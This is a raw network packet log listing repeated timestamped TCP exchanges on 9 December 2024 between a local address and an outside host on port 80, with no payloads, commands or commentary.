                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.264828920 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.265532970 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.265572071 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.265642881 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.265681028 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.266319990 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.266356945 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.266463995 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.266506910 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.267196894 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.267231941 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.339492083 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.339545965 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.339564085 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.339600086 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.339860916 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.339873075 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.339905977 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.339919090 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.340600014 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.340615034 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.340653896 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.340667009 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.341344118 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.341386080 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.341701984 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.341743946 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.342128038 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.342169046 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.342192888 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.342230082 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.342902899 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.342947006 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.342998028 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.343050003 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.343693972 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.343756914 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.343905926 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.343951941 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.344547987 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.344585896 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.344634056 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.344677925 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.345334053 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.345372915 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.345602989 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.345645905 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.346133947 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.346167088 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.346366882 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.346405983 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.346946955 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.346985102 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.425111055 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.425184965 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.425230026 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.425291061 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.425492048 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.425523996 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.425543070 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.425554991 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.426342010 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.426378012 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.426836014 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.426872969 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.427166939 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.427180052 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.427203894 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.427221060 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.427985907 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.428023100 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.428227901 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.428262949 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.428781033 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.428817987 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.428972006 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.429009914 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.429866076 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.429905891 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.430164099 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.430202007 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.430613995 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.430624962 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.430658102 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.431269884 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.431293964 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.431324959 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.431338072 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.432468891 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.432511091 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.432517052 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.432568073 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.432950020 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.432991982 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.433124065 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.433163881 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.433693886 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.433747053 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.433775902 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.433816910 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.434472084 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.434516907 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.434932947 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.434977055 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.435305119 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.435344934 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.435441017 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.435481071 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.436053991 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.436103106 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.436495066 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.436537027 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.436944962 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.436974049 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.437005997 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.437021971 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.437697887 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.437740088 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.438194036 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.438235998 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.438460112 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.438499928 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.438563108 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.438601971 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.439356089 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.439404964 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.440074921 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.440119028 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.440280914 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.440318108 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.440699100 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.440742016 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.440968990 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.441013098 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.441171885 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.441210985 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.441754103 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.441798925 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.442094088 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.442137957 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.442574978 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.442610979 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.443139076 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.443175077 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.443387032 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.443425894 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.443555117 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.443588972 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.444361925 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.444397926 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445064068 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445075035 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445096970 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445113897 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445311069 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445348978 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445786953 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445822954 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445928097 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.445961952 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.446631908 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.446667910 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.446773052 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.446810961 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.447438002 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.447475910 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.447607040 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.447642088 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.448268890 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.448296070 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.448319912 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.448331118 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.449322939 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.449359894 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.449507952 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.449543953 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.450084925 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.450095892 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.450125933 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.450731993 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.450771093 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.450876951 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.450916052 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.451594114 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.451606035 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.451633930 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.451646090 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.452383995 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.452394962 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.452429056 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.453248978 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.453289986 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.453522921 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.453557014 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.453932047 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.453969002 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.454116106 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.454154015 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.454849005 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.454885960 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.455497026 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.455534935 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.455538034 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.455550909 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.455571890 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.455588102 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.456947088 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.456959963 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.456985950 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.457005978 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.457257032 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.457269907 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.457293034 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.457307100 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.457968950 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.457982063 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.458009005 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.458019972 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.458789110 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.458830118 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.459050894 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.459095001 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.459558010 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.459602118 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.532707930 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.532762051 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.532901049 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.532938957 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.533071041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.533108950 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.533248901 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.533287048 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.534018993 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.534085035 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.534246922 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.534291029 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.534693003 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.534738064 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.535145998 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.535187960 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.535578012 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.535620928 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.535727978 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.535768986 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.536832094 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.536886930 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.536973000 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.537014961 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.537122011 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.537163973 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.537326097 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.537367105 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.538114071 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.538196087 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.538208961 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.538273096 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.538757086 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.538796902 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.539421082 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.539472103 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.539674997 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.539721966 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.539752960 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.539799929 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.617214918 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.617297888 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.617361069 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.617794037 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.617897987 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.617957115 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.618006945 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:27.618462086 CET8049898185.215.113.16192.168.2.6
